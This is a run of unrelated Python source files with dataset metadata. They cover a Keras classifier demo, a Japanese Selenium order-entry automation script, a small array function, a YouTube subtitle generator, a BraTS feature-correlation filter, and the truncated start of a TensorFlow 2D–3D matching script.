tensorflow.keras.layers import Dense\nfrom tensorflow.keras.optimizers import Adam\nfrom keras.utils.np_utils import to_categorical\n\nn_pts = 500\ncenters = [[-1, 1], [-1, -1], [1, -1], [1, 1], [0, 0]]\nX, y = datasets.make_blobs(n_samples=n_pts, random_state=123, centers=centers, cluster_std=0.4)\n\n# plt.scatter(X[y==0, 0], X[y==0, 1])\n# plt.scatter(X[y==1, 0], X[y==1, 1])\n# plt.scatter(X[y==2, 0], X[y==2, 1])\n# plt.scatter(X[y==3, 0], X[y==3, 1])\n# plt.scatter(X[y==4, 0], X[y==4, 1])\n# plt.show()\n\ny_cat = to_categorical(y, 5)\nmodel = Sequential()\nmodel.add(Dense(units=5, input_shape=(2,), activation='softmax'))\nmodel.compile(Adam(0.1), loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.fit(x=X, y=y_cat, verbose=1, batch_size=50, epochs=100)\n\ndef plotDecisionBoundary(X, y_cat, model):\n xSpan = np.linspace(min(X[:, 0]) - 1, max(X[:, 0]) + 1, 50)\n ySpan = np.linspace(min(X[:, 1]) - 1, max(X[:, 1]) + 1, 50)\n xx, yy = np.meshgrid(xSpan, ySpan)\n xx_, yy_ = xx.ravel(), yy.ravel()\n grid = np.c_[xx_, yy_]\n predFunc = np.argmax(model.predict(grid), axis =-1 )\n z = predFunc.reshape(xx.shape)\n plt.contourf(xx, yy, z)\n\nplotDecisionBoundary(X, y_cat, model)\n\nplt.scatter(X[y==0, 0], X[y==0, 1])\nplt.scatter(X[y==1, 0], X[y==1, 1])\nplt.scatter(X[y==2, 0], X[y==2, 1])\nplt.scatter(X[y==3, 0], X[y==3, 1])\nplt.scatter(X[y==4, 0], X[y==4, 1])\nx = 0.5\ny = 0.5\npoint = np.array([[x, y]])\nprediction = np.argmax(model.predict(point), axis =-1 )\nplt.plot([x], [y], marker='o', markersize=10, color='red')\nprint(\"Prediction is\", prediction)\nplt.show()", "sub_path": "Multiclass.py", "file_name": "Multiclass.py", "file_ext": "py", "file_size_in_byte": 1708, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sklearn.datasets.make_blobs", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 11, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "352229087", "text": "\"\"\"\n\n発注専用ウェブサイトの自動入力システム\n\n基幹システムから注文拠点ごとにデータを修正してエクセルへ貼付。\n注文システム起動。\n住所を確認してエンター完了。\n\n注文完了後Gsuite,GMailメールアドレスへ注文確認メールが届くので\n深夜、注文当日のGoogleAppsScriptでスプレッドシートへ注文内容をまとめて\nエクセルへ出力したのち指定のフォルダへ移動後に担当者へメールで処理後に報告。\n\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import Select # 選択画面\nfrom bs4 import BeautifulSoup\nimport pandas as pd \nimport csv\nimport time\nimport jaconv # 半角カナ文字対応\nimport pyodbc # DB\n\n# ChromeDriver\nchromedriverPath = \"chromedriver.exe\"\n\n# ログイン\nlogin_page_url = \"https://*****.bcart.jp/login.php\"\nlogin_id = \"****\"\nlogin_pass = \"****\"\n\n# 基本データ\nExcelFile = \"tmp_SmileBS_修正登録ファイル.xls\" # 基幹システムからエクスポートしたデータを入れる。\nCsvFileName = 'tmp_Web_登録用データ.csv' # 登録用の一時ファイルCSVを作成する。\n\n# 商品コードに該当商品の注文用URLを入れる。\nSyoHinCode = {}\nSyoHinCode['46990002'] = \"https://*****.bcart.jp/product.php?id=3\" # ポテトチップス(スタンダード)\nSyoHinCode['46990102'] = \"https://*****.bcart.jp/product.php?id=6\" # ポテトチップス(コンソメ)\n\n# 得意先データベースから個別の得意先データを取り出す。\ndef TokuiSakiData(TokuiSakiBanGo):\n\n TokuiSakiBanGo = str(TokuiSakiBanGo).zfill(8) # 8桁ゼロ埋め\n\n ConfigDic = {}\n ConfigDic['instance'] = \"***.***.***.***\\SMILEBS\" # インスタンス\n ConfigDic['user'] = \"***\" # ユーザー\n ConfigDic['pasword'] = \"***\" # パスワード\n ConfigDic['db'] = \"****_DB\" # DB #######がテストDB\n\n connection = \"DRIVER={SQL Server};SERVER=\" + ConfigDic['instance'] + \";uid=\" + ConfigDic['user'] + \\\n \";pwd=\" + ConfigDic['pasword'] + \";DATABASE=\" + ConfigDic['db']\n con = pyodbc.connect(connection)\n\n TABLE = \"****_T_TOKUISAKI_MST\" # 得意先マスターテーブル\n cur = con.cursor()\n sql = \"select * FROM \" + TABLE + \" WHERE TOK_CD = \" + str(TokuiSakiBanGo)\n cur.execute(sql)\n record = cur.fetchone()\n cur.close()\n con.close()\n\n TokuiSakiDataDic = {}\n TokuiSakiDataDic['得意先番号'] = int(record[0])\n TokuiSakiDataDic['得意先名'] = record[1].strip()\n TokuiSakiDataDic['郵便番号'] = record[3].strip()\n TokuiSakiDataDic['住所'] = record[4].strip() + record[5].strip()\n TokuiSakiDataDic['電話番号'] = record[6].strip()\n TokuiSakiDataDic['ルート'] = int(record[15]) # 注文済みデータ収集用\n TokuiSakiDataDic['請求書拠点'] = int(record[80]) # 注文済みデータ収集用\n\n return TokuiSakiDataDic\n\n# ChromeDriverのパスを引数に指定しChromeを起動\ndriver = webdriver.Chrome(chromedriverPath)\n\n# BeatifulSoupパーサー\ndef BsParse(source):\n return BeautifulSoup(source, 'html.parser')\n\n# 登録修正ファイルのデータをCSV化\ndef FileMake(ExcelFile, CsvFile):\n KobetsuNum = 0\n df = pd.read_excel(ExcelFile, skiprows=1, header=1)\n df_check = df[ df['個別発注番号'] > KobetsuNum ]\n df_check.to_csv(CsvFile, header=0, index=0)\n\n# 発注用にデータを作成したCSVをリスト化\ndef HattyuDataCsv(CsvFileName):\n HattyuList = []\n with open(CsvFileName,\"r\",encoding=\"utf-8\")as f:\n file = csv.reader(f)\n for x in file:\n HattyuList.append(x)\n\n # 昇順ソートで確認リストの順に処理ができる。\n HattyuList.sort(key=lambda x: x[3], reverse=False)\n return HattyuList\n\n#ログイン\ndef Login(login_page_url,login_id,login_pass):\n\n #ログインページへ\n driver.get(login_page_url)\n\n Xpath_loginidbox = \"/html/body/div[1]/div/div/form/section[1]/table/tbody/tr[1]/td/input\"\n driver.find_element_by_xpath(Xpath_loginidbox).send_keys(login_id)\n\n Xpath_loginpassbox = \"/html/body/div[1]/div/div/form/section[1]/table/tbody/tr[2]/td/input\"\n driver.find_element_by_xpath(Xpath_loginpassbox).send_keys(login_pass)\n\n Xpath_loginbutton = \"/html/body/div[1]/div/div/form/section[2]/input\"\n driver.find_element_by_xpath(Xpath_loginbutton).click()\n\n# メイン\ndef SyoHinPageData(HattyuList):\n\n for h in HattyuList:\n\n driver.get(SyoHinCode[h[8]]) # 商品ページ遷移\n source = driver.page_source\n soup = BsParse(source)\n\n TokuiNum = h[0] # 得意先番号\n #TokuiName = jaconv.h2z(HattyuList[1],digit=False, ascii=False)\n TokuiRyaku = h[1]\n KobetsuBanGo = str(int(float(h[4])))\n TyakaBi = h[7]\n TyuMonKoSu = str(int(h[10])) # 注文個数\n print(\"*** 発注情報 *****************************************************\")\n print(\"得意先番号: \",str(TokuiNum))\n print(\"得意先略称: \",str(TokuiRyaku))\n print(\"★ 着荷日 : \",str(TyakaBi))\n print(\"★ 個別番号: \",str(KobetsuBanGo))\n print(\"★ 注文個数: \",str(TyuMonKoSu),\"\\n\")\n\n # 着荷日順番把握\n title_text = soup.find_all('h2') # 全着荷日箇所 [\"[**]]YYYYmmdd着荷商品\",\"[**]YYYYmmdd着荷商品\"~\n TyakaBi_result = TyakaBi.split(\"-\")\n TyakaBiText = TyakaBi_result[0] + TyakaBi_result[1] + TyakaBi_result[2].zfill(2)\n\n for x in title_text:\n result = x.text.replace(\"[**]\",\"\")\n result = result.replace(\"着荷商品\",\"\")\n\n if result == TyakaBiText:\n #print(result,TyakaBiText)\n Xpath_index = int(title_text.index(x)) + 1\n\n # 注文個数入力\n Xpath_KonyuSu = \"/html/body/div[1]/div/div/form/section[1]/table/tbody/tr[\" + str(Xpath_index) + \"]/td[3]/div[2]/div[2]/input\"\n driver.find_element_by_xpath(Xpath_KonyuSu).send_keys(TyuMonKoSu)\n\n # カートに入れるボタンを押す\n Xpath_CurtButton = \"/html/body/div[1]/div/div/form/section[2]/button\"\n driver.find_element_by_xpath(Xpath_CurtButton).click()\n\n time.sleep(2) #カートに入れるポップアップ後インターバルがないとカートに商品が入らないことがある\n\n # カートを見る\n driver.get(\"https://*****.bcart.jp/cart.php\")\n\n # 注文へ進む\n Xpath_TyuMonButton = '//*[@id=\"cartForm1\"]/div[4]/ul/li[4]/button/span'\n driver.find_element_by_xpath(Xpath_TyuMonButton).click()\n\n # 別住所へ配送する。\n Xpath_BetsuHaisouButton = '/html/body/div[1]/div/div/form/section[3]/div/table[1]/tbody/tr/td/label[2]'\n driver.find_element_by_xpath(Xpath_BetsuHaisouButton).click()\n\n # 配送先 会社名 に得意先番号入れる\n Xpath_KaisyaName = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[1]/td/input\"\n driver.find_element_by_xpath(Xpath_KaisyaName).send_keys(TokuiNum) # 得意先番号\n\n # 発注番号\n Xpath_HaisouSakiSelect = '/html/body/div[1]/div/div/form/section[6]/div/table/tbody/tr/td/input'\n items = driver.find_element_by_xpath(Xpath_HaisouSakiSelect).send_keys(KobetsuBanGo)\n \n # コンソールに中も詳細を載せる。\n TokuiSakiDataDic = TokuiSakiData(TokuiNum) # DB接続\n PostCodeA = str(TokuiSakiDataDic['郵便番号'][:3])\n PostCodeB = str(TokuiSakiDataDic['郵便番号'][4:])\n TokuiName = jaconv.h2z(TokuiSakiDataDic['得意先名']) # h2z 半角to全角\n PhoneNo = TokuiSakiDataDic['電話番号']\n\n print(\"(\" + str(int(TokuiNum)) + \")\",TokuiName)\n print(\"郵便 :\", TokuiSakiDataDic['郵便番号'])\n print(\"住所 :\", TokuiSakiDataDic['住所'])\n address = TokuiSakiDataDic['住所']\n print(\"★ TEL:\" + PhoneNo)\n print(\"★ 個別番号: \",str(KobetsuBanGo),\"\\n\")\n\n # 郵便番号 まえ3桁入力\n Xpath_YubinA = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[4]/td/input[1]\"\n driver.find_element_by_xpath(Xpath_YubinA).send_keys(PostCodeA)\n\n # 郵便番号 うしろ4桁入力\n Xpath_YubinB = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[4]/td/input[2]\"\n driver.find_element_by_xpath(Xpath_YubinB).send_keys(PostCodeB)\n\n time.sleep(2) # 郵便番号入力後の自動表示間のインターバル時間\n\n # 番地枠のデータ取得する。 東京都杉並区 \"神田\"← ~\n Xpath_BanChi = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[7]/td/input\"\n BanChi = driver.find_element_by_xpath(Xpath_BanChi).get_attribute(\"value\")\n\n # 番地枠の住所で得意先住所を分割する。\n address_result = address.split(BanChi)\n\n # 後半住所入力\n Xpath_AddressC = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[8]/td/input\"\n driver.find_element_by_xpath(Xpath_AddressC).send_keys(jaconv.h2z(address_result[-1]))\n\n # 電話番号 ハイフンが足りなかったり無かったりするとウェブ上でエラーになる\n Xpath_PhoneNo = '/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[9]/td/input'\n driver.find_element_by_xpath(Xpath_PhoneNo).send_keys(PhoneNo)\n\n #配送先 担当者の枠に得意先様名を入れる。\n Xpath_TantoSyaName = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[3]/td/input\"\n driver.find_element_by_xpath(Xpath_TantoSyaName).send_keys(TokuiName) # 得意先様名\n \n CheckAddress = input(\"配送先住所を確認してください\\n\\n\\n\") # 得意先住所が郵便番号で出る住所に従っていないため確認後エンター\n print(\"----------------------------------------------------------------------------\")\n\n # 早く遷移しすぎるとエラーになる。\n Xpath_KakuninButton = '//*[@id=\"__js-submit\"]'\n driver.find_element_by_xpath(Xpath_KakuninButton).click() # 注文\"確認\"画面へ\n\n time.sleep(2) # コケたので2秒インターバル\n\n Xpath_TyumonKakutei = '//*[@id=\"orderForm\"]/section[6]/button/span'\n driver.find_element_by_xpath(Xpath_TyumonKakutei).click() # 注文\"確定\"画面へ\n\n time.sleep(2) # コケたので2秒インターバル\n\n\nif __name__ == \"__main__\":\n\n FileMake(ExcelFile, CsvFileName) # \"tmp_SmileBS_修正登録ファイル.xls\"から\"tmp_Web_登録用データ.csv\"作成\n HattyuList = HattyuDataCsv(CsvFileName) # 発注用に作成したデータをリスト化\n Login(login_page_url,login_id,login_pass) # ログイン\n SyoHinPageData(HattyuList) # 注文個数入力から発注確定画面まで\n", "sub_path": "WebHattyuSystem.py", "file_name": "WebHattyuSystem.py", "file_ext": "py", "file_size_in_byte": 10978, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyodbc.connect", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 76, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 85, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 93, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 159, "usage_type": "call"}, {"api_name": "jaconv.h2z", "line_number": 184, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 202, "usage_type": "call"}, {"api_name": "jaconv.h2z", "line_number": 213, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 230, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "184503828", "text": "# @author Huaze Shen\n# @date 2020-03-13\n\nfrom typing import List\n\n\ndef min_array(numbers: List[int]) -> int:\n min_val = numbers[0]\n for num in numbers:\n if num < min_val:\n min_val = num\n return min_val\n\n\nif __name__ == '__main__':\n numbers_ = [2, 2, 2, 0, 1]\n print(min_array(numbers_))\n", "sub_path": "python/find_minimum_in_rotated_sorted_array_ii.py", "file_name": "find_minimum_in_rotated_sorted_array_ii.py", "file_ext": "py", "file_size_in_byte": 320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "161474314", "text": "from pydub import AudioSegment\nfrom pydub.utils import make_chunks\nimport speech_recognition as sr\nfrom pytube import YouTube\nimport subprocess\nfrom googletrans import Translator\nimport os,os.path\nimport time\nimport datetime\n\nchunk_length_ms = 3000 \ntime2 = int(chunk_length_ms / 1000)\ntime3 = 2\n\ndef strt3(t3):\n\tb=[]\n\tl = len(t3)\n\ta=25\n\tfor n in range(l):\n\t\tif n % a == 0:\n\t\t\tb.append(t3[n:n+a])\n\n\treturn '\\n'.join(b)\n\ndef timestr(t):\n\tt1=t*time2\n\tt2=(t+1)*time2\n\tstr1=str(datetime.timedelta(seconds=t1))\n\tstr2=str(datetime.timedelta(seconds=t2))\n\tstr3='0'+str1+'.000 --> 0'+str2+'.000'\n\treturn str3\n\n#web为youtube地址\nweb='https://www.youtube.com/watch?v=mIxgx4eRVp8'\n\ntranslator = Translator()\nYouTube(web).streams.get_by_itag(22).download(filename='videoplayback')\n\ncommand = \"ffmpeg -i videoplayback.mp4 -ab 160k -ac 2 -ar 44100 -vn y2mate.wav\"\nsubprocess.call(command, shell=True)\n\nmyaudio = AudioSegment.from_file(\"y2mate.wav\" , \"wav\") \nchunks = make_chunks(myaudio, chunk_length_ms)\n\nfor i, chunk in enumerate(chunks):\n chunk_name = \"chunk{0}.wav\".format(i)\n print(\"exporting\", chunk_name)\n chunk.export(chunk_name, format=\"wav\")\n\nr=sr.Recognizer()\nt=[]\nt3=[]\nsum=i+1\na=int(sum/12)\nb=sum%12\nc=a*12\nt.append('hello')\nfor i in range(0,sum):\n\tharvard=sr.AudioFile('chunk'+str(i)+'.wav')\n\twith harvard as source:\n\t\taudio=r.record(source)\n\t\ttry:\n\t\t\ts=r.recognize_google(audio)\n\t\t\tt.append(s)\n\t\texcept Exception:\n\t\t\tt.append('')\n\t\tprint(i)\n\t\ttime.sleep(time3)\n\nfor i, val in enumerate(t):\n\ttry:\n\t\tt3.append(translator.translate(val, dest='zh-cn').text)\n\texcept Exception:\n\t\tt3.append('')\n\tprint(i)\n\ttime.sleep(time3)\n\ntxt=''\n\nfor i, val in enumerate(t):\n\tif i!=0:\n\t\tj=i-1\n\t\ttxt=txt+str(i)+'\\n'+timestr(j)+'\\n'+strt3(t3[i])+'\\n'+val+'\\n\\n'\n\t\tprint(i)\n\nf=open('videoplayback.srt','w',encoding='utf-8')\nf.write('\\ufeff')\nf.write(txt)\nf.close()\n\nfor i in range(0,sum):\n\tfilename='chunk'+str(i)+'.wav'\n\tif(os.path.exists(filename)):\n\t\tos.remove(filename) ", "sub_path": "speechrecognition.py", "file_name": "speechrecognition.py", "file_ext": "py", "file_size_in_byte": 1964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 29, "usage_type": "call"}, {"api_name": "googletrans.Translator", "line_number": 36, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 37, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 40, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 42, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 42, "usage_type": "name"}, {"api_name": "pydub.utils.make_chunks", "line_number": 43, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 50, "usage_type": "call"}, {"api_name": "speech_recognition.AudioFile", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "72797720", "text": "#!/usr/bin/env python3\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef encode_eor(inp: str):\n if type(inp) != str:\n if not np.isfinite(inp):\n return np.NaN\n elif inp == \"GTR\":\n return 1\n else:\n return 0\n\n\ninpfeat = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/trainingfeatures_Cg055_stdnorm.csv\",\n index_col=\"ID\")\n# load c-index information\ncindices = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/concordanceidx_training_nobinduplicates_stdnorm.csv\", index_col=\"Feature\")\n# handle alive patient with setting OS to 500 days\ninpfeat.loc[inpfeat[\"Survival_days\"] == 'ALIVE (361 days later)', \"Survival_days\"] = 500\ninpfeat[\"Survival_days\"] = inpfeat[\"Survival_days\"].astype(np.float)\n\n# encode EOR\n# inpfeat[\"Extent_of_Resection\"] = [encode_eor(elem) for elem in inpfeat[\"Extent_of_Resection\"]]\nfeatprocess_nosurv = inpfeat.drop(columns=[\"Survival_days\"])\nfeatprocess_nosurv = inpfeat.drop(columns=[\"Survival_class\"])\n\n# check mutual correlation of features\nprint(\"- calculating correlation matrix\")\ncorr_matrix = featprocess_nosurv.corr().abs()\nprint(\"- finished calculating correlation matrix\")\n# # corr_matrix.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/corrmatrix_trainingfeat.csv\")\n\n# corr_matrix = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/corrmatrix_trainingfeat.csv\")\n# corr_matrix.set_index(\"Unnamed: 0\", inplace=True)\nprint(\"Data loaded.\")\n\n# save correlation matrix\ncorr_matrix.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/corrmatrix_c055_stdnorm.csv\")\ncorr_np = corr_matrix.to_numpy()\nmask = np.triu(np.ones_like(corr_np, dtype=np.bool))\ncorr_masked = corr_matrix.mask(mask)\n\nmaxcorr = np.nanmax(corr_masked.values.flatten())\ncurr_corrmat = corr_masked\n\ncurrfeat = featprocess_nosurv\niterateidx = 0\nwhile maxcorr > 0.95:\n print(iterateidx)\n testidx = corr_masked[corr_masked == maxcorr].stack().index.tolist()\n\n featdroplist = []\n # for each highly correlated feature pair, only keep the one with the higher c-index\n for featcomb in testidx:\n # look up c-indices of both features, keep the one with the larger\n curr_cindlist = [cindices.loc[elem, \"ConcordanceIndex\"] for elem in featcomb]\n # add the lower one to the drop list\n featdroplist.append(featcomb[np.argmin(curr_cindlist)])\n\n featdroplist_unique = np.unique(featdroplist)\n currfeat.drop(columns=featdroplist_unique, inplace=True)\n\n curr_corrmat = currfeat.corr().abs()\n corr_np = curr_corrmat.to_numpy()\n mask = np.triu(np.ones_like(corr_np, dtype=np.bool))\n corr_masked = curr_corrmat.mask(mask)\n\n maxcorr = np.nanmax(corr_masked.values.flatten())\n print(maxcorr)\n print(currfeat.shape)\n iterateidx += 1\n print('----------')\n\nprint(currfeat.shape)\n# put survival column back into the feature matrix\nsurvinfo = inpfeat[\"Survival_days\"]\niterativecorr = currfeat.merge(survinfo, on=\"ID\")\niterativecorr.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/trainingfeatures_iterativeremoved_stdnorm.csv\")\n\n# plot correlation matrix\nf = plt.figure(figsize=(200, 200))\nplt.matshow(corr_masked)\n# only show group ticks\nfeattypes = [elem.split('_')[0:2] for elem in currfeat.columns]\nlabels = np.array([[0,15],[16,36],[37,82],[83,111],[112,149]])\n\n# plt.xticks(range(corr_matrix.shape[1]), corr_matrix.columns, fontsize=5, rotation=45)\n# plt.xticks(range(corr_masked.shape[1]), corr_masked.columns, fontsize=2, rotation=90)\n# plt.yticks(range(corr_masked.shape[1]), corr_masked.columns, fontsize=2)\ncb = plt.colorbar()\ncb.ax.tick_params(labelsize=8)\n# plt.title('Correlation Matrix', fontsize=16)\nplt.tight_layout()\nplt.savefig(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/reducedcorr_iterative_stdnorm.png\", dpi=400)\nplt.show()\n", "sub_path": "classicalml/standardnorm/checkcorrelation_iterative_stdnorm.py", "file_name": "checkcorrelation_iterative_stdnorm.py", "file_ext": "py", "file_size_in_byte": 4002, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.isfinite", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.triu", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.nanmax", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.nanmax", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.matshow", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "602725192", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 14 00:40:27 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 21:35:04 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 21:17:55 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 10:43:52 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 18 20:25:02 2018\n\n@author: mengdan\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom vgg16 import vgg16\nfrom pointNet import pointNet\nfrom read_dataset import Data, splitTrainTest, shuffleTrainset\n\nimport os\nimport cv2\n\nbatch_size = 16\nimage_size = 128\npcl_size = 1024\nimage_feature_dim = 256\npcl_feature_dim = 256\n\nthresh_dist = 0.5\n\ndate_time = '2015-02-13-09-16-26'\nsift_iss_correspond_dir = '/media/mengdan/data3/robotcar/grasshopper/2d_3d_correspondences_256/' + date_time\n\n\n\ndef readTestData(sift_test_root, iss_test_root):\n # get test list which store sift_patches\n # patch_file = list[submap_id][image_id]][patch_id]\n sift_test_list = []\n for submap_folder in sorted(os.listdir(sift_test_root)):\n submap_img_folder_list = []\n submap_folder_path = sift_test_root+submap_folder\n for image_folder in sorted(os.listdir(submap_folder_path)):\n img_folder_file_list = []\n img_folder_path = submap_folder_path + '/' +image_folder\n for img_file in sorted(os.listdir(img_folder_path)):\n if img_file.endswith('.png'):\n img_folder_file_list.append(img_folder_path + '/'+ img_file)\n submap_img_folder_list.append(img_folder_file_list)\n sift_test_list.append(submap_img_folder_list)\n \n # get test list which store iss_volumes\n # iss_file = list[submap_id][iss_id]\n iss_test_list = []\n for submap_folder in sorted(os.listdir(iss_test_root)):\n submap_iss_file_list = []\n submap_folder_path = iss_test_root + submap_folder\n for iss_file in sorted(os.listdir(submap_folder_path)):\n if iss_file.endswith('.pcd'):\n submap_iss_file_list.append(submap_folder_path+'/'+iss_file)\n iss_test_list.append(submap_iss_file_list)\n \n return sift_test_list, iss_test_list\n\n\ndef getSIFTTestBatch(sift_test_list, batch_id):\n img_batch = np.zeros([batch_size, image_size, image_size,3], np.float32) \n start_id = batch_id * batch_size\n end_id = (batch_id + 1) * batch_size \n \n if (end_id > len(sift_test_list)):\n 